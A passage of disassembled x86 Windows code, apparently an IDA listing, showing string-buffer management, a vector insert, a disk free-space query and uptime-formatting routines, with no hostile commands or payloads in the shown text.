call sub_42B82A
sub_41B1F6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B213 proc near ; CODE XREF: .text:0041B253�p
; DATA XREF: .text:004384DC�o
mov eax, offset loc_43653C
call sub_42B6FC
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4373C4
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_41B427
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_42B94B
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41B213 endp
; ---------------------------------------------------------------------------
loc_41B250: ; DATA XREF: .text:off_4373C4�o
push esi
mov esi, ecx
call sub_41B213
test byte ptr [esp+8], 1
jz short loc_41B266
push esi
call sub_429006
pop ecx
loc_41B266: ; CODE XREF: .text:0041B25D�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_41B26C proc near ; CODE XREF: sub_41B1F6+A�p
; sub_41B33A+7�p ...
mov eax, offset loc_436550
call sub_42B6FC
push ecx
push ebx
mov ebx, [ebp+8]
push esi
push edi
mov esi, ecx
push ebx
mov [ebp-10h], esi
call sub_42B901
and dword ptr [ebp-4], 0
add ebx, 0Ch
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_41B427
push 0FFFFFFFFh
push 0
push ebx
mov ecx, edi
call sub_41B35A
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_4373C4
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_41B26C endp
; =============== S U B R O U T I N E =======================================
sub_41B2C4 proc near ; CODE XREF: sub_41B301+20�p
; DATA XREF: .text:00438478�o
mov eax, offset loc_436564
call sub_42B6FC
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4373C4
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_41B427
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_42B94B
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41B2C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B301 proc near ; DATA XREF: .text:004373DC�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41B33A
lea eax, [ebp+var_1C]
push offset dword_438474
push eax
call sub_42B82A
loc_41B31E: ; DATA XREF: .text:off_4373D4�o
push esi
mov esi, ecx
call sub_41B2C4
test [esp+20h+var_18], 1
jz short loc_41B334
push esi
call sub_429006
pop ecx
loc_41B334: ; CODE XREF: sub_41B301+2A�j
mov eax, esi
pop esi
retn 4
sub_41B301 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B33A proc near ; CODE XREF: sub_41B301+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41B26C
mov dword ptr [esi], offset off_4373D4
mov eax, esi
pop esi
retn 4
sub_41B33A endp
; ---------------------------------------------------------------------------
loc_41B352: ; CODE XREF: .text:0043650F�j
; .text:004365BF�j ...
push 1
call sub_41B427
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B35A proc near ; CODE XREF: sub_41B189+42�p
; sub_41B26C+3A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_41B372
call sub_4290F9
loc_41B372: ; CODE XREF: sub_41B35A+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_41B384
mov esi, [ebp+arg_8]
loc_41B384: ; CODE XREF: sub_41B35A+25�j
cmp edi, ebx
jnz short loc_41B3A2
add esi, ecx
push 0FFFFFFFFh
push esi
mov ecx, edi
call sub_41B494
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_41B494
jmp short loc_41B41E
; ---------------------------------------------------------------------------
loc_41B3A2: ; CODE XREF: sub_41B35A+2C�j
test esi, esi
jbe short loc_41B3E5
cmp esi, eax
jnz short loc_41B3E5
mov eax, [ebx+4]
test eax, eax
jnz short loc_41B3B6
mov eax, offset dword_437338
loc_41B3B6: ; CODE XREF: sub_41B35A+55�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_41B3E5
push 1
mov ecx, edi
call sub_41B427
mov eax, [ebx+4]
test eax, eax
jnz short loc_41B3D1
mov eax, offset dword_437338
loc_41B3D1: ; CODE XREF: sub_41B35A+70�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_41B41E
; ---------------------------------------------------------------------------
loc_41B3E5: ; CODE XREF: sub_41B35A+4A�j
; sub_41B35A+4E�j ...
push 1
push esi
mov ecx, edi
call sub_41B4FB
test al, al
jz short loc_41B41E
mov eax, [ebp+arg_0]
mov eax, [eax+4]
test eax, eax
jnz short loc_41B402
mov eax, offset dword_437338
loc_41B402: ; CODE XREF: sub_41B35A+A1�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_429350
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_41B41E: ; CODE XREF: sub_41B35A+46�j
; sub_41B35A+89�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_41B35A endp
; =============== S U B R O U T I N E =======================================
sub_41B427 proc near ; CODE XREF: sub_41B12F+19�p
; sub_41B189+36�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_41B44F
mov eax, [esi+4]
test eax, eax
jz short loc_41B44F
dec eax
mov cl, [eax]
test cl, cl
jz short loc_41B448
cmp cl, 0FFh
jz short loc_41B448
dec byte ptr [eax]
jmp short loc_41B44F
; ---------------------------------------------------------------------------
loc_41B448: ; CODE XREF: sub_41B427+16�j
; sub_41B427+1B�j
push eax
call sub_429006
pop ecx
loc_41B44F: ; CODE XREF: sub_41B427+8�j
; sub_41B427+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_41B427 endp
; =============== S U B R O U T I N E =======================================
sub_41B45F proc near ; CODE XREF: sub_41B12F+2F�p
; sub_41B809+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
push edi
mov esi, ecx
call sub_41B4FB
test al, al
jz short loc_41B48D
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_429350
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_41B48D: ; CODE XREF: sub_41B45F+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_41B45F endp
; =============== S U B R O U T I N E =======================================
sub_41B494 proc near ; CODE XREF: sub_41B35A+35�p
; sub_41B35A+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_41B4A7
call sub_4290F9
loc_41B4A7: ; CODE XREF: sub_41B494+C�j
mov ecx, edi
call sub_41B809
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_41B4BD
mov ebx, eax
loc_41B4BD: ; CODE XREF: sub_41B494+25�j
test ebx, ebx
jbe short loc_41B4F3
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_42B9C0
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_41B4FB
test al, al
jz short loc_41B4F3
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_41B4F3: ; CODE XREF: sub_41B494+2B�j
; sub_41B494+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_41B494 endp
; =============== S U B R O U T I N E =======================================
sub_41B4FB proc near ; CODE XREF: sub_41B35A+90�p
; sub_41B45F+B�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_41B50D
call sub_429011
loc_41B50D: ; CODE XREF: sub_41B4FB+B�j
mov eax, [esi+4]
xor edx, edx
cmp eax, edx
jz short loc_41B535
mov cl, [eax-1]
cmp cl, dl
jz short loc_41B535
cmp cl, 0FFh
jz short loc_41B535
cmp edi, edx
mov ecx, esi
jnz short loc_41B574
dec byte ptr [eax-1]
push edx
loc_41B52C: ; CODE XREF: sub_41B4FB+48�j
call sub_41B427
loc_41B531: ; CODE XREF: sub_41B4FB+4C�j
; sub_41B4FB+53�j
xor al, al
jmp short loc_41B57C
; ---------------------------------------------------------------------------
loc_41B535: ; CODE XREF: sub_41B4FB+19�j
; sub_41B4FB+20�j ...
cmp edi, edx
jnz short loc_41B550
cmp [esp+8+arg_4], dl
jz short loc_41B545
push 1
mov ecx, esi
jmp short loc_41B52C
; ---------------------------------------------------------------------------
loc_41B545: ; CODE XREF: sub_41B4FB+42�j
cmp eax, edx
jz short loc_41B531
mov [esi+8], edx
mov [eax], dl
jmp short loc_41B531
; ---------------------------------------------------------------------------
loc_41B550: ; CODE XREF: sub_41B4FB+3C�j
cmp [esp+8+arg_4], dl
jz short loc_41B56D
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_41B562
cmp eax, edi
jnb short loc_41B57A
loc_41B562: ; CODE XREF: sub_41B4FB+61�j
push 1
mov ecx, esi
call sub_41B427
jmp short loc_41B572
; ---------------------------------------------------------------------------
loc_41B56D: ; CODE XREF: sub_41B4FB+59�j
cmp [esi+0Ch], edi
jnb short loc_41B57A
loc_41B572: ; CODE XREF: sub_41B4FB+70�j
mov ecx, esi
loc_41B574: ; CODE XREF: sub_41B4FB+2B�j
push edi
call sub_41B74C
loc_41B57A: ; CODE XREF: sub_41B4FB+65�j
; sub_41B4FB+75�j
mov al, 1
loc_41B57C: ; CODE XREF: sub_41B4FB+38�j
pop edi
pop esi
retn 8
sub_41B4FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B581 proc near ; CODE XREF: sub_41B11E+9�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ecx
push edi
mov edi, [ebp+arg_4]
mov ecx, [esi+8]
mov eax, [esi+0Ch]
sub eax, ecx
sar eax, 2
cmp eax, edi
jnb loc_41B673
mov edx, [esi+4]
test edx, edx
jz short loc_41B5B2
mov eax, ecx
sub eax, edx
sar eax, 2
cmp edi, eax
jb short loc_41B5B4
loc_41B5B2: ; CODE XREF: sub_41B581+24�j
mov eax, edi
loc_41B5B4: ; CODE XREF: sub_41B581+2F�j
test edx, edx
jnz short loc_41B5BC
xor ecx, ecx
jmp short loc_41B5C1
; ---------------------------------------------------------------------------
loc_41B5BC: ; CODE XREF: sub_41B581+35�j
sub ecx, edx
sar ecx, 2
loc_41B5C1: ; CODE XREF: sub_41B581+39�j
add eax, ecx
test eax, eax
mov [ebp+var_4], eax
jge short loc_41B5CC
xor eax, eax
loc_41B5CC: ; CODE XREF: sub_41B581+47�j
shl eax, 2
push eax
call sub_42B407
mov edx, eax
mov eax, [esi+4]
pop ecx
mov [ebp+arg_4], edx
jmp short loc_41B5EE
; ---------------------------------------------------------------------------
loc_41B5E0: ; CODE XREF: sub_41B581+70�j
test edx, edx
jz short loc_41B5E8
mov ecx, [eax]
mov [edx], ecx
loc_41B5E8: ; CODE XREF: sub_41B581+61�j
add edx, 4
add eax, 4
loc_41B5EE: ; CODE XREF: sub_41B581+5D�j
cmp eax, [ebp+arg_0]
jnz short loc_41B5E0
test edi, edi
mov eax, edx
jbe short loc_41B60C
mov ecx, edi
loc_41B5FB: ; CODE XREF: sub_41B581+89�j
test eax, eax
jz short loc_41B606
mov ebx, [ebp+arg_8]
mov ebx, [ebx]
mov [eax], ebx
loc_41B606: ; CODE XREF: sub_41B581+7C�j
add eax, 4
dec ecx
jnz short loc_41B5FB
loc_41B60C: ; CODE XREF: sub_41B581+76�j
mov eax, [esi+8]
mov ecx, edi
shl ecx, 2
cmp [ebp+arg_0], eax
mov [ebp+arg_8], eax
lea ebx, [ecx+edx]
jz short loc_41B63B
mov eax, ebx
sub eax, ecx
sub eax, edx
add eax, [ebp+arg_0]
loc_41B628: ; CODE XREF: sub_41B581+B8�j
test ebx, ebx
jz short loc_41B630
mov ecx, [eax]
mov [ebx], ecx
loc_41B630: ; CODE XREF: sub_41B581+A9�j
add eax, 4
add ebx, 4
cmp eax, [ebp+arg_8]
jnz short loc_41B628
loc_41B63B: ; CODE XREF: sub_41B581+9C�j
push dword ptr [esi+4]
call sub_429006
mov eax, [ebp+var_4]
mov edx, [esi+4]
pop ecx
mov ecx, [ebp+arg_4]
test edx, edx
lea eax, [ecx+eax*4]
mov [esi+0Ch], eax
jnz short loc_41B65B
xor eax, eax
jmp short loc_41B663
; ---------------------------------------------------------------------------
loc_41B65B: ; CODE XREF: sub_41B581+D4�j
mov eax, [esi+8]
sub eax, edx
sar eax, 2
loc_41B663: ; CODE XREF: sub_41B581+D8�j
add eax, edi
mov [esi+4], ecx
lea eax, [ecx+eax*4]
mov [esi+8], eax
jmp loc_41B745
; ---------------------------------------------------------------------------
loc_41B673: ; CODE XREF: sub_41B581+19�j
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, edx
sar eax, 2
cmp eax, edi
jnb short loc_41B6EF
mov ebx, edi
shl ebx, 2
cmp edx, ecx
mov [ebp+arg_0], ebx
lea eax, [ebx+edx]
mov [ebp+var_4], eax
jz short loc_41B6B6
sub eax, ebx
mov ebx, [ebp+var_4]
mov [ebp+arg_4], eax
loc_41B69B: ; CODE XREF: sub_41B581+130�j
test ebx, ebx
jz short loc_41B6A6
mov eax, [eax]
mov [ebx], eax
mov eax, [ebp+arg_4]
loc_41B6A6: ; CODE XREF: sub_41B581+11C�j
add eax, 4
add ebx, 4
cmp eax, ecx
mov [ebp+arg_4], eax
jnz short loc_41B69B
mov ebx, [ebp+arg_0]
loc_41B6B6: ; CODE XREF: sub_41B581+110�j
mov eax, [esi+8]
mov ecx, eax
sub ecx, edx
sar ecx, 2
sub edi, ecx
mov ecx, [ebp+arg_8]
jz short loc_41B6DA
mov [ebp+arg_0], edi
loc_41B6CA: ; CODE XREF: sub_41B581+157�j
test eax, eax
jz short loc_41B6D2
mov edi, [ecx]
mov [eax], edi
loc_41B6D2: ; CODE XREF: sub_41B581+14B�j
add eax, 4
dec [ebp+arg_0]
jnz short loc_41B6CA
loc_41B6DA: ; CODE XREF: sub_41B581+144�j
mov eax, [esi+8]
jmp short loc_41B6E6
; ---------------------------------------------------------------------------
loc_41B6DF: ; CODE XREF: sub_41B581+167�j
mov edi, [ecx]
mov [edx], edi
add edx, 4
loc_41B6E6: ; CODE XREF: sub_41B581+15C�j
cmp edx, eax
jnz short loc_41B6DF
add [esi+8], ebx
jmp short loc_41B745
; ---------------------------------------------------------------------------
loc_41B6EF: ; CODE XREF: sub_41B581+FE�j
test edi, edi
jbe short loc_41B745
shl edi, 2
mov eax, ecx
mov ebx, ecx
mov [ebp+arg_0], edi
sub eax, edi
jmp short loc_41B712
; ---------------------------------------------------------------------------
loc_41B701: ; CODE XREF: sub_41B581+193�j
test ebx, ebx
jz short loc_41B70C
mov edi, [eax]
mov [ebx], edi
mov edi, [ebp+arg_0]
loc_41B70C: ; CODE XREF: sub_41B581+182�j
add ebx, 4
add eax, 4
loc_41B712: ; CODE XREF: sub_41B581+17E�j
cmp eax, ecx
jnz short loc_41B701
mov ecx, [esi+8]
mov eax, ecx
sub eax, edi
cmp edx, eax
jz short loc_41B72F
loc_41B721: ; CODE XREF: sub_41B581+1AC�j
sub eax, 4
sub ecx, 4
cmp eax, edx
mov ebx, [eax]
mov [ecx], ebx
jnz short loc_41B721
loc_41B72F: ; CODE XREF: sub_41B581+19E�j
lea eax, [edi+edx]
jmp short loc_41B73E
; ---------------------------------------------------------------------------
loc_41B734: ; CODE XREF: sub_41B581+1BF�j
mov ecx, [ebp+arg_8]
mov ecx, [ecx]
mov [edx], ecx
add edx, 4
loc_41B73E: ; CODE XREF: sub_41B581+1B1�j
cmp edx, eax
jnz short loc_41B734
add [esi+8], edi
loc_41B745: ; CODE XREF: sub_41B581+ED�j
; sub_41B581+16C�j ...
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_41B581 endp
; =============== S U B R O U T I N E =======================================
sub_41B74C proc near ; CODE XREF: sub_41B4FB+7A�p
mov eax, offset loc_436570
call sub_42B6FC
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_41B772
mov edi, [ebp+8]
loc_41B772: ; CODE XREF: sub_41B74C+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_41B77F
xor eax, eax
loc_41B77F: ; CODE XREF: sub_41B74C+2F�j
push eax
call sub_42B407
pop ecx
mov [ebp+8], eax
jmp short loc_41B7B0
; ---------------------------------------------------------------------------
loc_41B78B: ; DATA XREF: .text:00438570�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_41B79A
xor eax, eax
loc_41B79A: ; CODE XREF: sub_41B74C+4A�j
push eax
call sub_42B407
mov [ebp+8], eax
pop ecx
mov eax, offset loc_41B7AA
retn
; ---------------------------------------------------------------------------
loc_41B7AA: ; DATA XREF: sub_41B74C+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_41B7B0: ; CODE XREF: sub_41B74C+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_41B7CE
cmp eax, edi
jbe short loc_41B7BD
mov eax, edi
loc_41B7BD: ; CODE XREF: sub_41B74C+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_429350
add esp, 0Ch
loc_41B7CE: ; CODE XREF: sub_41B74C+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_41B427
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_41B7EE
mov edi, ebx
loc_41B7EE: ; CODE XREF: sub_41B74C+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [edi+eax], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_41B74C endp
; =============== S U B R O U T I N E =======================================
sub_41B809 proc near ; CODE XREF: sub_41B494+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_41B836
mov al, [esi-1]
test al, al
jz short loc_41B836
cmp al, 0FFh
jz short loc_41B836
push 1
call sub_41B427
push esi
call sub_4292D0
pop ecx
push eax
push esi
mov ecx, edi
call sub_41B45F
loc_41B836: ; CODE XREF: sub_41B809+9�j
; sub_41B809+10�j ...
pop edi
pop esi
retn
sub_41B809 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B839 proc near ; CODE XREF: sub_41B88C+F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
push edi
or eax, 0FFFFFFFFh
push 1
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
call dword_456FE4 ; SetErrorMode
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call dword_4370D4 ; GetDiskFreeSpaceExA
push 2
call dword_456FE4 ; SetErrorMode
mov eax, [ebp+arg_0]
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_41B839 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B88C proc near ; CODE XREF: sub_41BD3B+2A0�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_41B839
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jnz short loc_41B8E0
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jnz short loc_41B8E0
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jnz short loc_41B8E0
xor eax, eax
mov [ebp+var_30], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_1C], eax
jmp short loc_41B91E
; ---------------------------------------------------------------------------
loc_41B8E0: ; CODE XREF: sub_41B88C+29�j
; sub_41B88C+34�j ...
mov eax, [ebp+arg_8]
cdq
mov edi, edx
mov esi, eax
push edi
push esi
push [ebp+var_14]
push [ebp+var_18]
call sub_42B220
push edi
push esi
push [ebp+var_C]
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
push [ebp+var_10]
call sub_42B220
push edi
push esi
push [ebp+var_4]
mov [ebp+var_28], eax
mov [ebp+var_24], edx
push [ebp+var_8]
call sub_42B220
mov [ebp+var_1C], edx
loc_41B91E: ; CODE XREF: sub_41B88C+52�j
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
push 6
lea esi, [ebp+var_30]
pop ecx
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_41B88C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B932 proc near ; CODE XREF: sub_401990+87�p
; sub_40A938+193F�p ...
var_2C = qword ptr -2Ch
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor edi, edi
push 32h
mov esi, offset dword_457FBC
push edi
push esi
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call dword_4370C0 ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call dword_4370BC ; QueryPerformanceFrequency
cmp [ebp+var_C], edi
jl short loc_41B9B7
jg short loc_41B96E
cmp [ebp+var_10], edi
jbe short loc_41B9B7
loc_41B96E: ; CODE XREF: sub_41B932+35�j
cmp [ebp+var_4], edi
jl short loc_41B9B7
jg short loc_41B97A
cmp [ebp+var_8], edi
jbe short loc_41B9B7
loc_41B97A: ; CODE XREF: sub_41B932+41�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_42B220
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx ; double
fstp [esp+2Ch+var_2C]
call sub_42A636
mov eax, [ebp+arg_4]
mov dword ptr [ebp+var_18+4], edi
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fsubp st(1), st
call sub_42A910
mov ecx, eax
jmp short loc_41B9D0
; ---------------------------------------------------------------------------
loc_41B9B7: ; CODE XREF: sub_41B932+33�j
; sub_41B932+3A�j ...
mov eax, [ebp+arg_0]
mov edi, 3E8h
xor edx, edx
mov ecx, edi
div ecx
xor edx, edx
mov ecx, eax
mov eax, [ebp+arg_4]
div edi
sub ecx, eax
loc_41B9D0: ; CODE XREF: sub_41B932+83�j
mov eax, ecx
xor edx, edx
mov ecx, 15180h
mov edi, 0E10h
div ecx
push 3Ch
pop ebx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
mov edi, eax
mov eax, edx
xor edx, edx
div ebx
cmp [ebp+arg_8], 0
jnz short loc_41BA10
test ecx, ecx
ja short loc_41BA10
push edx
push eax
push edi
push offset a0_2d0_2d0_2d ; "%0.2d:%0.2d:%0.2d"
push esi
call sub_429A33
add esp, 14h
jmp short loc_41BA32
; ---------------------------------------------------------------------------
loc_41BA10: ; CODE XREF: sub_41B932+C5�j
; sub_41B932+C9�j
cmp ecx, 1
mov ebx, offset byte_454A34
jz short loc_41BA1F
mov ebx, offset aS_2 ; "s"
loc_41BA1F: ; CODE XREF: sub_41B932+E6�j
push edx
push eax
push edi
push ebx
push ecx
push offset aDDayS0_2d0_2d0 ; "%d day%s %0.2d:%0.2d:%0.2d"
push esi
call sub_429A33
add esp, 1Ch
loc_41BA32: ; CODE XREF: sub_41B932+DC�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41B932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA39 proc near ; CODE XREF: sub_41D5E0+22�p
; sub_41D70C+25�p ...
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
xor esi, esi
push 32h
push esi
push offset dword_457F50
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call dword_4370C0 ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call dword_4370BC ; QueryPerformanceFrequency
cmp [ebp+var_C], esi
jl short loc_41BAAB
jg short loc_41BA72
cmp [ebp+var_10], esi
jbe short loc_41BAAB
loc_41BA72: ; CODE XREF: sub_41BA39+32�j
cmp [ebp+var_4], esi
jl short loc_41BAAB
jg short loc_41BA7E
cmp [ebp+var_8], esi
jbe short loc_41BAAB
loc_41BA7E: ; CODE XREF: sub_41BA39+3E�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_42B220
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_42A636
pop ecx
pop ecx
call sub_42A910
jmp short loc_41BAB7
; ---------------------------------------------------------------------------
loc_41BAAB: ; CODE XREF: sub_41BA39+30�j
; sub_41BA39+37�j ...
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 3E8h
div ecx
loc_41BAB7: ; CODE XREF: sub_41BA39+70�j
xor edx, edx
mov ecx, 15180h
div ecx
pop esi
leave
retn
sub_41BA39 endp
; =============== S U B R O U T I N E =======================================
sub_41BAC3 proc near ; CODE XREF: sub_40A938+1AF5�p
push esi
push 32h
mov esi, offset dword_457F84
push 0
push esi
call sub_429690
add esp, 0Ch
call sub_41BC27
test eax, eax
jnz short loc_41BAFB
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aSD_1 ; "%s <%d>"
push esi
call sub_429A33
add esp, 10h
jmp short loc_41BB41
; ---------------------------------------------------------------------------
loc_41BAFB: ; CODE XREF: sub_41BAC3+1A�j
xor edx, edx
mov ecx, 15180h
div ecx
push ebx
push edi
mov edi, 0E10h
push 3Ch
pop ebx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
mov edi, eax
mov eax, edx
xor edx, edx
div ebx
cmp ecx, 1
mov edx, offset byte_454A34
jz short loc_41BB2D
mov edx, offset aS_2 ; "s"
loc_41BB2D: ; CODE XREF: sub_41BAC3+63�j
push eax
push edi
push edx
push ecx
push offset aDDayS0_2d0_2d ; "%d day%s %0.2d:%0.2d"
push esi
call sub_429A33
add esp, 18h
pop edi
pop ebx
loc_41BB41: ; CODE XREF: sub_41BAC3+36�j
mov eax, esi
pop esi
retn
sub_41BAC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB45 proc near ; CODE XREF: sub_40A938+1AE7�p
; sub_41BC58:loc_41BC67�p
var_30 = qword ptr -30h
var_1C = qword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
lea eax, [ebp+var_14]
push edi
xor esi, esi
push eax
mov [ebp+var_4], esi
call dword_4370C0 ; QueryPerformanceCounter
lea eax, [ebp+var_C]
push eax
call dword_4370BC ; QueryPerformanceFrequency
cmp [ebp+var_10], esi
jl short loc_41BBAC
